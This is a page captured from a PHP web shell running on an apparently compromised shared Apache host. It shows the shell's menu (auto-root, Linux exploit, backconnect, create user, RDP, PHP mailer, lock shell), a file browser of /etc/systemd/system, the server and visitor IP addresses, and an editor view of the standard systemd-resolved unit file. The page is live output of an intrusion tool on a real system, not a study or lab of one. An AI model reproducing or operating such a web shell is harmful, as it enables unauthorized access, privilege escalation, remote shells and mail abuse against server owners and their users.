Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2@apache2-argon.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-bongo.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-cabo.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-dap.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-emu.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-fritz.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-grog.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-heavy.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-igloo.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-jolly.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-kant.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-linus.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-moon.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-noxim.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-ogle.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-pat.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-quack.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-rank.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-sith.service.d
[ DIR ]
drwxr-xr-x
apache2@apache2-twiddle.servic...
[ DIR ]
drwxr-xr-x
apache2@apache2-udder.service....
[ DIR ]
drwxr-xr-x
apache2@apache2-vat.service.d
[ DIR ]
drwxr-xr-x
apt-daily-upgrade.timer.d
[ DIR ]
drwxr-xr-x
apt-daily.timer.d
[ DIR ]
drwxr-xr-x
cadvisor.service.d
[ DIR ]
drwxr-xr-x
emergency.target.wants
[ DIR ]
drwxr-xr-x
fstrim.timer.d
[ DIR ]
drwxr-xr-x
getty.target.wants
[ DIR ]
drwxr-xr-x
mdmonitor.service.wants
[ DIR ]
drwxr-xr-x
multi-user.target.wants
[ DIR ]
drwxr-xr-x
network-online.target.wants
[ DIR ]
drwxr-xr-x
network-pre.target.wants
[ DIR ]
drwxr-xr-x
open-vm-tools.service.requires
[ DIR ]
drwxr-xr-x
paths.target.wants
[ DIR ]
drwxr-xr-x
postfix@.service.d
[ DIR ]
drwxr-xr-x
remote-fs.target.wants
[ DIR ]
drwxr-xr-x
rescue.target.wants
[ DIR ]
drwxr-xr-x
sleep.target.wants
[ DIR ]
drwxr-xr-x
sockets.target.wants
[ DIR ]
drwxr-xr-x
sysinit.target.wants
[ DIR ]
drwxr-xr-x
timers.target.wants
[ DIR ]
drwxr-xr-x
vector.service.d
[ DIR ]
drwxr-xr-x
cadvisor.service
542
B
-rw-r--r--
cgrulesengd.service
397
B
-rw-r--r--
dbus-org.freedesktop.resolve1....
1.74
KB
-rw-r--r--
dbus-org.freedesktop.thermald....
309
B
-rw-r--r--
dh-identity.service
261
B
-rw-r--r--
iscsi.service
987
B
-rw-r--r--
multipath-tools.service
798
B
-rw-r--r--
ndn-cgroup-cleaner.service
166
B
-rw-r--r--
ndn-cgroup-cleaner.timer
158
B
-rw-r--r--
ndn-cgroup-updater.service
166
B
-rw-r--r--
ndn-cgroup-updater.timer
157
B
-rw-r--r--
node_exporter.service
1.55
KB
-rw-r--r--
script_exporter.service
300
B
-rw-r--r--
smartctl_exporter.service
755
B
-rw-r--r--
smartd.service
353
B
-rw-r--r--
sshd.service
538
B
-rw-r--r--
syslog.service
469
B
-rw-r--r--
vmtoolsd.service
489
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dbus-org.freedesktop.resolve1.service
# SPDX-License-Identifier: LGPL-2.1-or-later # # This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Network Name Resolution Documentation=man:systemd-resolved.service(8) Documentation=man:org.freedesktop.resolve1(5) Documentation=https://www.freedesktop.org/wiki/Software/systemd/writing-network-configuration-managers Documentation=https://www.freedesktop.org/wiki/Software/systemd/writing-resolver-clients DefaultDependencies=no After=systemd-sysusers.service systemd-networkd.service Before=network.target nss-lookup.target shutdown.target Conflicts=shutdown.target Wants=nss-lookup.target [Service] AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE BusName=org.freedesktop.resolve1 CapabilityBoundingSet=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE ExecStart=!!/lib/systemd/systemd-resolved LockPersonality=yes MemoryDenyWriteExecute=yes NoNewPrivileges=yes PrivateDevices=yes PrivateTmp=yes ProtectProc=invisible ProtectClock=yes ProtectControlGroups=yes ProtectHome=yes ProtectKernelLogs=yes ProtectKernelModules=yes ProtectKernelTunables=yes ProtectSystem=strict Restart=always RestartSec=0 RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6 RestrictNamespaces=yes RestrictRealtime=yes RestrictSUIDSGID=yes RuntimeDirectory=systemd/resolve RuntimeDirectoryPreserve=yes SystemCallArchitectures=native SystemCallErrorNumber=EPERM SystemCallFilter=@system-service Type=notify User=systemd-resolve WatchdogSec=3min [Install] WantedBy=multi-user.target Alias=dbus-org.freedesktop.resolve1.service
Close